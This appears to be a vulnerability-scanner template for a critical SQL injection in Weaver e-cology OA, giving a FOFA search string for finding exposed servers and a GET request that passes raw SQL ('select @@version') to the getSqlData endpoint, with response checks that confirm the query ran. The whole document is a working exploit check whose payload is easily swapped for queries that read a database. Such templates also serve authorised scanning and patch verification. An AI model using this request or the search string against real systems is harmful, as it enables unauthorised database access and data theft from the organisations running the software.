漏洞描述
fofa: app="泛微-协同办公OA"
id: e-cology-getsqldata-sql-inject
info:
name: 泛微OA E-Cology getSqlData SQL注入漏洞
author: zan8in
severity: critical
description: |-
fofa: app="泛微-协同办公OA"
tags: ecology,sql-inject
created: 2023/06/23
rules:
r0:
request:
method: GET
path: /Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version
expression: response.status == 200 && response.body.bcontains(b'{"api_status":') && response.body.bcontains(b'"status":true}')
expression: r0()